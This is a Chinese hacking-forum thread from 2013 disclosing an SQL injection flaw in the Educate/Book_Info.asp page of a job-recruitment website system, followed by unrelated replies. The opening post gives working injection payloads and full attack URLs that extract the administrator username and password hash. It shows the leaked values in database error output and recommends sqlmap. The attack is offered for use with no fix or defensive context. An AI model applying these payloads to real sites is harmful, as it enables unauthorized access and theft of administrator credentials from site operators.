网络求职招聘人才网站系统正式版漏洞

admin · 发表于 2013-2-14 09:50:16

漏洞出现在Educate/Book_Info.asp

此处注入点虽然过滤了一些关键字但是我们还是可以盲注的可以利用sqlmap跑出

exp：如下
查询管理账号：+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
查询管理密码：+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)

http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)

Microsoft OLE DB Provider for SQL Server 错误 '80040e07'

将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。

/Educate/Book_Info.asp，行 8

http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)

Microsoft OLE DB Provider for SQL Server 错误 '80040e07'

将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。

/Educate/Book_Info.asp，行 8

njtzzx · 发表于 2013-2-18 02:49:39

支持一下吧

尘封往事 · 发表于 2013-2-20 04:54:40

@,@..是什么意思呀？

132321a · 发表于 2013-2-20 07:59:03

我帮你喝喝

今生、已开始 · 发表于 2013-2-23 02:48:59

感謝樓主

小跑 · 发表于 2013-2-24 21:38:41

接到陌生电话请先说，“你好，找哪位”

太子 · 发表于 2013-2-27 13:03:48

文笔流畅，修辞得体，深得魏晋诸朝遗风，更将唐风宋骨发扬得入木三分，能在有生之年看见楼主的这个帖子。实在是我三生之幸啊。

炼狱魔龙 · 发表于 2014-12-26 09:54:46

我不是随便的人。我随便起来不是人

熙儿 · 发表于 2015-1-26 13:16:26

貌似我真的很笨????哎

陈启慧 · 发表于 2015-2-28 15:43:46

你喜欢贴子还是发贴子的人